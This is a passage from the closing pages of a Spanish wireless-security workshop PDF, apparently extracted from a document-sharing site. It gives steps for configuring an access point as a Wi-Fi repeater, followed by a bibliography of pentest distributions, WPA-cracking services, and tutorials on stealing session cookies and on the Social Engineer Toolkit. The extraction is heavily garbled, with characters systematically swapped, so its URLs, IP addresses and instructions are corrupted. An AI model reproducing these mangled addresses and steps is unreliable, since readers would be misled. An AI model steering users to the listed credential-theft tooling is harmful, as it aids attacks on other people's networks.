=.- (uscaremos con el portátil un punto intermedio entre el router wii + elordenador al 5ue 5ueremos llevar la seal ampliicada. Este será el puntodonde ijaremos el punto de acceso) por lo 5ue deberemos buscar unalocali3ación con toma de corriente) + debe 7aber cobertura de la wii 5ue

5ueremos ampliicar 8aun5ue sea m2nima9<.- ijaremos la I% de la cone#ión Et7ernet del portátil en =F<.=;.=.=00 8por ejemplo9) <AA.<AA.<AA.0 8El resto de parámetros no nos interesan + pueden5uedar en blanco9

D.- Conectando un cable Et7ernet al portátil entraremos en la coniguracióndel punto de acceso entrando en un navegador con la dirección=F<.=;.=.<A4 8%ara 5ue este paso uncione correctamente lea el manual desu punto de acceso por5ue la dirección de coniguración puede variar9

256

Page 257: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 257/260

4.- En el apartado $ireless) cambiar a modo GRepeaterH) seleccionar el pa2s+ pinc7ar en G'urve+H. 'eleccionaremos el ''I! 8nombre de la red wii9 5uedeseamos ampliicar + guardaremos los cambios. 8No reiniciaremos el puntode acceso 7asta el inal9

A.- En el apartado de seguridad) seleccionaremos el tipo de encriptación denuestro router) pondremos la clave correspondiente + guardaremos.

.- En el apartado Networ/-^"N cambiaremos el modo a !+namic I%. Coneste paso el router se reiniciará + perderemos la cone#ión Et7ernet.Bolveremos a poner la dirección I% del portátil a la 5ue tuvi6ramos antes8normalmente todo en modo automático9

M.- Comprobaremos movi6ndonos con el portátil cómo la cobertura wii 7a

mejorado sustancialmente.

Bi3liogra$2a

"in/s 1aller de seguridad inalambrica

$iisla#7ttp??www.wiisla#.com,odulos $iisla#7ttp??www.wiisla#.com?categor+?modulos-e#tra? 

BideotutorialesComo crear modulos #3m en $iisla#7ttps??www.+outube.com?watc7Sv[ao,"MDI0 *o+script$E%7ttps??www.+outube.com?watc7Sv[Qwwj$=Djlg *o+script$%'7ttps??www.+outube.com?watc7Sv[o;BAA'-*/EI *o+script$%

7ttps??www.+outube.com?watc7Sv[mF-D&5#KIA; Como Crear %unto de acseso also en $ii'la# usando irssl7ttp??www.+outube.com?watc7Sv[#j(&sKO Como Capturar credenciales de sesión en navegadores con Coo/iemonster 7ttp??www.+outube.com?watc7Sv[luij+M-/bs Como usar la 7erramienta El Ca3ador Ca3ado7ttp??www.+outube.com?watc7Sv[rMrnmF<;d4 Como usar 'ocial Engineer 1ool/it7ttps??www.+outube.com?watc7Sv[/<D>mYCE'&Y 

257

Page 258: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 258/260

'eguridad $ireless7ttp??www.seguridadwireless.net7ttp??oro.seguridadwireless.net 

Centro 'ocial Escarnio e ,aldi3er 7ttp??csoaescarnioemaldi3er.wordpress.com "inssid7ttp??sourceorge.net?projects?linssid?7ttp??ppa.launc7pad.net?wseverin?ppa?ubuntu !istibuciones "inu# para pen testing + seguridade7ttp??www.blac/moreops.com?<0=4?0<?0D?notable-penetration-test-linu#-distributions-o-<0=4? 7ttp??www.concise-courses.com?securit+?top-ten-distros? 7ttp??www.securit+distro.com?securit+-distros 

7ttp??www.wiisla#.com? 7ttp??www.wiiwa+.org? 7ttp??www./ali.org? 7ttp??www.bac/trac/-linu#.org? 7ttp??sourceorge.net?projects?#iaopanos? 7ttp??www.beini.es? 7ttp??sourceorge.net?projects?#iaopanos?iles?(eini? 7ttp??www.node3ero-linu#.org? 7ttp??www.bac/bo#.org? 7ttp??sourceorge.net?projects?blac/buntu? 7ttp??samurai.inguardians.com? 7ttp??s-t-d.org? 7ttp??www.pentoo.c7? 7ttp??wea/netlabs.com?main? 7ttp??www.matriu#.com? 7ttp??www.detlinu#.net?  7ttp??www.caine-live.net? 7ttp??www.parrotsec.org?inde#.p7p?,ainT%age 7ttp??www.blac/arc7.org? 

7ttp??www.networ/securit+tool/it.org? 7ttp??sourceorge.net?projects?/atana-usb? 7ttp??sourceorge.net?projects?galsotportable?iles? 7ttp??www.#ce.org?projects?#burn 7ttp??www.pendrivelinu#.com? 

>tros sitios web7ttp??www.aircrac/-ng.org?do/u.p7p 7ttp??www.el7ac/er.net? 7ttp??unctionmi#er.blogspot.com? 

258

Page 259: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 259/260

7ttp??www.bitsdelocos.es?computo.p7p 7ttp??tin+url.com?+amas-btA 7ttp??lampiweb.com?oro?inde#.p7pStopic[FF=D.0 7ttp??blogricardo.wordpress.com?<00;?=<?<;?script-para-generar-

diccionarios-de-uer3a-bruta? 7ttp??www.crac/-wpa.r? 7ttp??www.openwall.com?jo7n? 7ttp??www.t7c.org? 7ttp??www.lampiweb.com? 7ttp??netenti.blogspot.com? 7ttp??www.erg.abdn.ac.u/?ergcms?wavemon? 7ttp??www.nta-monitor.com?tools?arp-scan?  7ttp??7ome.base.be?r7inc/#t?captiveTportalTis7ing.3ip 7ttp??www.aircrac/-ng.org? 

7ttp??wpa.dar/ircop.org? 7ttp??wpa-sec.stanev.org?  7ttps??gpu7as7.me? 7ttp??www.gremwell.com? 7ttp??www.inob+tesec.com?demo?javaTwinM.7tm 7ttp??www.inob+tesec.com? 7ttp??joncraton.org?blog?4?netcat-or-windows? 7ttp??la#marcaellugar.blogspot.com? 7ttp??oous.net?goons?i33gig?gdump?downloads.7tm 7ttp??www.7ac/times.com?contrasenasTdeTwindows? 

7ttp??wi-e+e.3a=d.com? 7ttp??code.google.com?p?svtool3?issues?listScan[=W5[7ttp??p+rit.googlecode.com? 7ttp??www.securit+tube.net?video?=F<= 7ttp??wea/netlabs.com?code?wiica/e 7ttp??www.i(eini.com? 7ttp??www.arg-wireless.com.ar? 7ttp??www.no-ip.com? 

17e 'ocial Engineer 1ool/it 8'E1 97ttps??git7ub.com?trustedsec?social-engineer-tool/it 7ttp??www.aldeid.com?wi/i?'ocial-Engineer-1ool/it-'E1  Bideotutorial G&sing 'ocial Engineer 1ool/itH7ttps??www.+outube.com?watc7Sv[/<D>mYCE'&Y 7ttps??www.trustedsec.com?downloads?social-engineer-tool/it? erramientas android7ttp??www.bus+bo#.net? 7ttp??www.dsploit.net?  ,odulo 7erramientas pentest

259

Page 260: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 260/260

7ttp??www.wiisla#.com?0<A-pentestTtools-i4;-=4sw-#3m?Reporting tools7ttp??www.gee/+s7ows.com?<0=D?0M?7ow-to-use-maltego-caseile-in-/ali.7tml7ttp??/eepnote.org?manual? 

7ttp??www.gremwell.com?using magictree 5uic/ intro 7ttp??www.gee/+s7ows.com?<0=D?0M?7ow-to-use-maltego-in-/ali-linu#.7tml